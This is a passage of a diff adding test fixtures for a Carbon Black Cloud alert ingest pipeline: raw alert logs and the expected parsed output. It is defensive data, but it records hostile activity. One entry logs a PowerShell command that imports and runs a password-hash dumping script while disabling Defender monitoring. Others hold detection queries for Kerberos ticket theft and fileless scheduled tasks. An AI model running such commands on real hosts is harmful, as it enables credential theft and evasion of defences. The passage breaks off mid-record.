x64\",\"device_username\":\"demouser@demo.org\",\"device_location\":\"OFFSITE\",\"device_external_ip\":\"34.234.170.45\",\"device_internal_ip\":\"10.0.14.120\",\"ttps\":[\"FILELESS\",\"MALWARE_APP\",\"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER\",\"MITRE_T1059_001_POWERSHELL\",\"RUN_MALWARE_APP\"],\"attack_tactic\":\"TA0002\",\"process_guid\":\"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73\",\"process_pid\":3600,\"process_name\":\"c:\\\\users\\\\administrator\\\\appdata\\\\local\\\\temp\\\\powerdump.ps1\",\"process_sha256\":\"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0\",\"process_md5\":\"42a80cc2333b612b63a859f17474c9af\",\"process_reputation\":\"KNOWN_MALWARE\",\"process_effective_reputation\":\"KNOWN_MALWARE\",\"process_cmdline\":\"\\\"powershell.exe\\\" & {Write-Host \\\\\\\"\\\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\\\\\"\\\" -fore green\\nImport-Module \\\\\\\"\\\"$Env:Temp\\\\PowerDump.ps1\\\\\\\"\\\"\\nInvoke-PowerDump}\",\"process_username\":\"KOGNOS-W19-CB-3\\\\Administrator\",\"parent_guid\":\"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed\",\"parent_pid\":4024,\"parent_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_username\":\"KOGNOS-W19-CB-3\\\\Administrator\",\"childproc_guid\":\"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000\",\"childproc_effective_reputation\":\"RESOLVING\",\"childproc_username\":\"KOGNOS-W19-CB-3\\\\Administrator\",\"blocked_effective_reputation\":\"RESOLVING\",\"mdr_alert_notes_present\":false,\"mdr_alert\":false}", + "reason": "A known virus (HackTool: Powerpuff) was detected running.", + "severity": 5, + "start": "2023-07-17T17:15:33.396Z" + }, + "host": { + "hostname": "Kognos-W19-CB-3", + "id": "6948863", + "name": "Kognos-W19-CB-3", + "os": { + "type": "windows", + "version": "Windows Server 2019 x64" + } + }, + "process": { + "command_line": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "entity_id": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "executable": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "powerdump.ps1", + "parent": { + "entity_id": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "powershell.exe", + "pid": 4024 + }, + "pid": 3600 + }, + "related": { + "hash": [ + "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", + "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0", + "42a80cc2333b612b63a859f17474c9af" + ], + "hosts": [ + "Kognos-W19-CB-3" + ], + "user": [ + "demouser@demo.org" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "demouser@demo.org" + } + } + ] +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log new file mode 100644 index 00000000000..00d440f9a01 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log @@ -0,0 +1,2 @@ +{"org_key":"ABCD1234","alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234","id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f","type":"CONTAINER_RUNTIME","backend_timestamp":"2023-02-06T00:13:37.663Z","user_update_timestamp":"2023-04-13T11:55:52.550Z","backend_update_timestamp":"2023-02-06T00:13:37.663Z","detection_timestamp":"2023-02-06T00:10:51.176Z","first_event_timestamp":"2023-02-06T00:09:19.320Z","last_event_timestamp":"2023-02-06T00:09:19.320Z","severity":5,"reason":"Detected a connection to a public destination that isn't allowed for this scope","reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58","threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c","primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-04-13T11:55:52.550Z","changed_by_type":"USER","changed_by":"sample@demoorg.com","closure_reason":"NO_REASON","status":"IN_PROGRESS"},"determination":{"change_timestamp":"2023-02-22T21:07:57.955Z","value":"NONE","changed_by_type":"USER","changed_by":"sample@demoorg.com"},"tags":["demotag"],"alert_notes_present":false,"threat_notes_present":true,"is_updated":false,"mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"netconn_remote_port":443,"netconn_local_port":56618,"netconn_protocol":"TCP","netconn_remote_domain":"demo.remote.domain.com","netconn_remote_ip":"175.16.199.0","netconn_local_ip":"1.128.0.0","netconn_remote_ipv4":"175.16.199.0","netconn_local_ipv4":"1.128.0.0","k8s_cluster":"demo:demo-cluster","k8s_namespace":"kube-system","k8s_kind":"DaemonSet","k8s_workload_name":"ama-logs","k8s_pod_name":"ama-logs-gm5tt","k8s_policy_id":"2e5170e7-2665-49d2-829e-f5bdeefe6b06","k8s_policy":"Big runtime policy","k8s_rule_id":"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58","k8s_rule":"Allowed public destinations","connection_type":"EGRESS","egress_group_id":"","egress_group_name":"","ip_reputation":96,"remote_is_private":false} +{"version":"2.0.0","org_key":"ABCD1234","alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f","id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f","type":"CONTAINER_RUNTIME","is_updated":false,"detection_timestamp":"2023-02-06T00:10:51.176Z","first_event_timestamp":"2023-02-06T00:09:19.320Z","last_event_timestamp":"2023-02-06T00:09:19.320Z","severity":5,"reason":"Detected a connection to a public destination that isn't allowed for this scope","threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c","primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61","workflow":{"status":"OPEN","change_timestamp":"2023-02-06T00:13:37.663Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON"},"alert_notes_present":false,"policy_applied":"NOT_APPLIED","run_state":"RAN","reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58","sensor_action":"ALLOW","device_target_value":"MEDIUM","device_os":"WINDOWS","device_location":"UNKNOWN","k8s_policy_id":"ef4ccd0b-df14-4f5d-8454-480c5193a0b7","k8s_policy":"Big runtime policy","k8s_rule_id":"11111111-1111-1111-1111-111111111111","k8s_rule":"Allowed public destinations","k8s_cluster":"tomer:sensor-aks","k8s_namespace":"kube-system","k8s_kind":"DaemonSet","k8s_workload_name":"ama-logs","k8s_pod_name":"ama-logs-gm5tt","connection_type":"EGRESS","ip_reputation":96,"netconn_remote_port":443,"netconn_local_port":56618,"netconn_protocol":"TCP","netconn_remote_domain":"westeurope.monitoring.azure.com","netconn_remote_ip":"67.43.156.0","netconn_local_ip":"10.244.2.22","netconn_remote_ipv4":"67.43.156.0","netconn_local_ipv4":"10.244.2.22","remote_is_private":false,"process_guid":"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33","process_pid":2100834,"process_name":"KUBERNETES_RUNTIME_NODE_AGENT","process_sha256":"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5","process_md5":"4cbdc5f51d0397b26886191b799131d5","process_reputation":"NOT_LISTED","process_effective_reputation":"RESOLVING","mdr_alert_notes_present":false,"mdr_alert":false} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log-expected.json new file mode 100644 index 00000000000..0e2db8cc74a --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-container-runtime.log-expected.json @@ -0,0 +1,190 @@ +{ + "expected": [ + { + "@timestamp": "2023-02-06T00:10:51.176Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2023-02-06T00:13:37.663Z", + "backend_update_timestamp": "2023-02-06T00:13:37.663Z", + "category": "THREAT", + "connection_type": "EGRESS", + "determination": { + "change_timestamp": "2023-02-22T21:07:57.955Z", + "changed_by": "sample@demoorg.com", + "changed_by_type": "USER", + "value": "NONE" + }, + "ip_reputation": 96, + "is_updated": false, + "k8s_cluster": "demo:demo-cluster", + "k8s_kind": "DaemonSet", + "k8s_namespace": "kube-system", + "k8s_pod_name": "ama-logs-gm5tt", + "k8s_policy": "Big runtime policy", + "k8s_policy_id": "2e5170e7-2665-49d2-829e-f5bdeefe6b06", + "k8s_rule": "Allowed public destinations", + "k8s_rule_id": "f8b1637a-dc0c-49bb-bc28-5b48f97e6d58", + "k8s_workload_name": "ama-logs", + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "netconn": { + "local_ip": "1.128.0.0", + "local_ipv4": "1.128.0.0", + "local_port": 56618, + "protocol": "TCP", + "remote_domain": "demo.remote.domain.com", + "remote_ip": "175.16.199.0", + "remote_ipv4": "175.16.199.0", + "remote_port": 443 + }, + "organization_key": "ABCD1234", + "policy_applied": "NOT_APPLIED", + "primary_event_id": "X0z55sxeTGWPfKuzPkFlCg-61", + "reason_code": "2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58", + "remote_is_private": false, + "run_state": "RAN", + "sensor_action": "ALLOW", + "tags": [ + "demotag" + ], + "threat_id": "0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c", + "threat_notes_present": true, + "type": "CONTAINER_RUNTIME", + "url": "defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234", + "user_update_timestamp": "2023-04-13T11:55:52.550Z", + "workflow": { + "change_timestamp": "2023-04-13T11:55:52.550Z", + "changed_by": "sample@demoorg.com", + "changed_by_type": "USER", + "closure_reason": "NO_REASON", + "status": "IN_PROGRESS" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-02-06T00:09:19.320Z", + "id": "f0c7970b-f23c-919e-0cd8-7a38bd373a6f", + "kind": "alert", + "original": "{\"org_key\":\"ABCD1234\",\"alert_url\":\"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234\",\"id\":\"f0c7970b-f23c-919e-0cd8-7a38bd373a6f\",\"type\":\"CONTAINER_RUNTIME\",\"backend_timestamp\":\"2023-02-06T00:13:37.663Z\",\"user_update_timestamp\":\"2023-04-13T11:55:52.550Z\",\"backend_update_timestamp\":\"2023-02-06T00:13:37.663Z\",\"detection_timestamp\":\"2023-02-06T00:10:51.176Z\",\"first_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"last_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"severity\":5,\"reason\":\"Detected a connection to a public destination that isn't allowed for this scope\",\"reason_code\":\"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58\",\"threat_id\":\"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c\",\"primary_event_id\":\"X0z55sxeTGWPfKuzPkFlCg-61\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2023-04-13T11:55:52.550Z\",\"changed_by_type\":\"USER\",\"changed_by\":\"sample@demoorg.com\",\"closure_reason\":\"NO_REASON\",\"status\":\"IN_PROGRESS\"},\"determination\":{\"change_timestamp\":\"2023-02-22T21:07:57.955Z\",\"value\":\"NONE\",\"changed_by_type\":\"USER\",\"changed_by\":\"sample@demoorg.com\"},\"tags\":[\"demotag\"],\"alert_notes_present\":false,\"threat_notes_present\":true,\"is_updated\":false,\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"netconn_remote_port\":443,\"netconn_local_port\":56618,\"netconn_protocol\":\"TCP\",\"netconn_remote_domain\":\"demo.remote.domain.com\",\"netconn_remote_ip\":\"175.16.199.0\",\"netconn_local_ip\":\"1.128.0.0\",\"netconn_remote_ipv4\":\"175.16.199.0\",\"netconn_local_ipv4\":\"1.128.0.0\",\"k8s_cluster\":\"demo:demo-cluster\",\"k8s_namespace\":\"kube-system\",\"k8s_kind\":\"DaemonSet\",\"k8s_workload_name\":\"ama-logs\",\"k8s_pod_name\":\"ama-logs-gm5tt\",\"k8s_policy_id\":\"2e5170e7-2665-49d2-829e-f5bdeefe6b06\",\"k8s_policy\":\"Big runtime policy\",\"k8s_rule_id\":\"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58\",\"k8s_rule\":\"Allowed public destinations\",\"connection_type\":\"EGRESS\",\"egress_group_id\":\"\",\"egress_group_name\":\"\",\"ip_reputation\":96,\"remote_is_private\":false}", + "reason": "Detected a connection to a public destination that isn't allowed for this scope", + "severity": 5, + "start": "2023-02-06T00:09:19.320Z" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2023-02-06T00:10:51.176Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "category": "THREAT", + "connection_type": "EGRESS", + "device": { + "location": "UNKNOWN", + "os": "WINDOWS", + "target_value": "MEDIUM" + }, + "ip_reputation": 96, + "is_updated": false, + "k8s_cluster": "tomer:sensor-aks", + "k8s_kind": "DaemonSet", + "k8s_namespace": "kube-system", + "k8s_pod_name": "ama-logs-gm5tt", + "k8s_policy": "Big runtime policy", + "k8s_policy_id": "ef4ccd0b-df14-4f5d-8454-480c5193a0b7", + "k8s_rule": "Allowed public destinations", + "k8s_rule_id": "11111111-1111-1111-1111-111111111111", + "k8s_workload_name": "ama-logs", + "mdr": { + "alert": false, + "alert_notes_present": false + }, + "netconn": { + "local_ip": "10.244.2.22", + "local_ipv4": "10.244.2.22", + "local_port": 56618, + "protocol": "TCP", + "remote_domain": "westeurope.monitoring.azure.com", + "remote_ip": "67.43.156.0", + "remote_ipv4": "67.43.156.0", + "remote_port": 443 + }, + "organization_key": "ABCD1234", + "policy_applied": "NOT_APPLIED", + "primary_event_id": "X0z55sxeTGWPfKuzPkFlCg-61", + "process": { + "effective_reputation": "RESOLVING", + "guid": "ABCD1234-00000000-00200e62-00000000-1d92c1262642b33", + "hash": { + "md5": "4cbdc5f51d0397b26886191b799131d5", + "sha256": "506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5" + }, + "name": "KUBERNETES_RUNTIME_NODE_AGENT", + "pid": 2100834, + "reputation": "NOT_LISTED" + }, + "reason_code": "2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58", + "remote_is_private": false, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c", + "type": "CONTAINER_RUNTIME", + "url": "https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f", + "version": "2.0.0", + "workflow": { + "change_timestamp": "2023-02-06T00:13:37.663Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-02-06T00:09:19.320Z", + "id": "f0c7970b-f23c-919e-0cd8-7a38bd373a6f", + "kind": "alert", + "original": "{\"version\":\"2.0.0\",\"org_key\":\"ABCD1234\",\"alert_url\":\"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f\",\"id\":\"f0c7970b-f23c-919e-0cd8-7a38bd373a6f\",\"type\":\"CONTAINER_RUNTIME\",\"is_updated\":false,\"detection_timestamp\":\"2023-02-06T00:10:51.176Z\",\"first_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"last_event_timestamp\":\"2023-02-06T00:09:19.320Z\",\"severity\":5,\"reason\":\"Detected a connection to a public destination that isn't allowed for this scope\",\"threat_id\":\"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c\",\"primary_event_id\":\"X0z55sxeTGWPfKuzPkFlCg-61\",\"workflow\":{\"status\":\"OPEN\",\"change_timestamp\":\"2023-02-06T00:13:37.663Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\"},\"alert_notes_present\":false,\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"reason_code\":\"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58\",\"sensor_action\":\"ALLOW\",\"device_target_value\":\"MEDIUM\",\"device_os\":\"WINDOWS\",\"device_location\":\"UNKNOWN\",\"k8s_policy_id\":\"ef4ccd0b-df14-4f5d-8454-480c5193a0b7\",\"k8s_policy\":\"Big runtime policy\",\"k8s_rule_id\":\"11111111-1111-1111-1111-111111111111\",\"k8s_rule\":\"Allowed public destinations\",\"k8s_cluster\":\"tomer:sensor-aks\",\"k8s_namespace\":\"kube-system\",\"k8s_kind\":\"DaemonSet\",\"k8s_workload_name\":\"ama-logs\",\"k8s_pod_name\":\"ama-logs-gm5tt\",\"connection_type\":\"EGRESS\",\"ip_reputation\":96,\"netconn_remote_port\":443,\"netconn_local_port\":56618,\"netconn_protocol\":\"TCP\",\"netconn_remote_domain\":\"westeurope.monitoring.azure.com\",\"netconn_remote_ip\":\"67.43.156.0\",\"netconn_local_ip\":\"10.244.2.22\",\"netconn_remote_ipv4\":\"67.43.156.0\",\"netconn_local_ipv4\":\"10.244.2.22\",\"remote_is_private\":false,\"process_guid\":\"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33\",\"process_pid\":2100834,\"process_name\":\"KUBERNETES_RUNTIME_NODE_AGENT\",\"process_sha256\":\"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5\",\"process_md5\":\"4cbdc5f51d0397b26886191b799131d5\",\"process_reputation\":\"NOT_LISTED\",\"process_effective_reputation\":\"RESOLVING\",\"mdr_alert_notes_present\":false,\"mdr_alert\":false}", + "reason": "Detected a connection to a public destination that isn't allowed for this scope", + "severity": 5, + "start": "2023-02-06T00:09:19.320Z" + }, + "host": { + "os": { + "type": "windows" + } + }, + "process": { + "entity_id": "ABCD1234-00000000-00200e62-00000000-1d92c1262642b33", + "executable": "KUBERNETES_RUNTIME_NODE_AGENT", + "hash": { + "md5": "4cbdc5f51d0397b26886191b799131d5", + "sha256": "506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5" + }, + "name": "KUBERNETES_RUNTIME_NODE_AGENT", + "pid": 2100834 + }, + "related": { + "hash": [ + "506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5", + "4cbdc5f51d0397b26886191b799131d5" + ] + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log new file mode 100644 index 00000000000..c72a8d54e5a --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log @@ -0,0 +1,2 @@ +{"org_key":"7DESJ9GN","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN","id":"1c6aba68-24cc-41e3-ad8e-4b545a587b55","type":"WATCHLIST","backend_timestamp":"2024-03-13T08:03:29.540Z","user_update_timestamp":null,"backend_update_timestamp":"2024-03-13T08:03:29.540Z","detection_timestamp":"2024-03-13T08:02:36.578Z","first_event_timestamp":"2024-03-13T08:00:09.894Z","last_event_timestamp":"2024-03-13T08:00:09.894Z","severity":5,"reason":"Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"","reason_code":"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d","threat_id":"C21CA826573A8D974C1E93C8471AAB7F","primary_event_id":"re9M9hp8TbGLqyk6QXqQqA-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2024-03-13T08:03:29.540Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2024-03-13T08:03:29.540Z","value":"NONE","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION"},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":6612391,"device_name":"EIP\\WW-20002","device_uem_id":"","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_username":"EIP\\Administrator","device_location":"UNKNOWN","device_external_ip":"75.98.230.194","device_internal_ip":"172.16.100.140","asset_group":[],"mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a","report_name":"Execution - AMSI - New Fileless Scheduled Task Behavior Detected","report_description":"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.","report_tags":["execution","privesc","persistence","t1053","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1053/","ioc_id":"d1080521-e617-4e45-94e0-7a145c62c90a","ioc_hit":"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe","process_pid":5172,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3","process_md5":"2e5a8590cf6848968fc23de3fa1e25f1","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1","process_username":"NT AUTHORITY\\SYSTEM","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275","parent_pid":1916,"parent_name":"c:\\windows\\system32\\svchost.exe","parent_sha256":"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3","parent_md5":"145dcf6706eeea5b066885ee17964c09","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule","parent_username":"NT AUTHORITY\\SYSTEM","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"NOT_ANOMALOUS","ml_classification_global_prevalence":"LOW","ml_classification_org_prevalence":"LOW","ml_classification_anomalies":[]} +{"org_key":"ABCD1234","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234","id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f","type":"WATCHLIST","backend_timestamp":"2023-07-17T17:21:34.063Z","user_update_timestamp":null,"backend_update_timestamp":"2023-07-17T17:21:34.063Z","detection_timestamp":"2023-07-17T17:21:13.483Z","first_event_timestamp":"2023-07-17T17:19:00.412Z","last_event_timestamp":"2023-07-17T17:19:00.412Z","severity":10,"reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"","reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab","threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C","primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-07-17T17:21:34.063Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2023-07-17T17:21:34.063Z","value":"NONE","changed_by_type":null,"changed_by":null},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":5890528,"device_name":"demodevice","device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows 11 x64","device_username":"Test-Win11","device_location":"UNKNOWN","device_external_ip":"1.2.3.4","device_internal_ip":"4.3.2.1","mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018","report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior","report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.","report_tags":["credentialaccess","t1558","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1558/003/","ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018","ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423","process_pid":13636,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd","process_md5":"0499440c4b0783266183246e384c6657","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -","process_username":"NT AUTHORITY\\SYSTEM","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9","parent_pid":10384,"parent_name":"c:\\program files\\demo\\sample\\myscript.exe","parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282","parent_md5":"c7e583681f0958d4f5d32afd09d8084b","parent_effective_reputation":"NOT_LISTED","parent_reputation":"NOT_LISTED","parent_cmdline":"\"C:\\Program Files\\demo\\sample\\myscript.exe\" ","parent_username":"NT 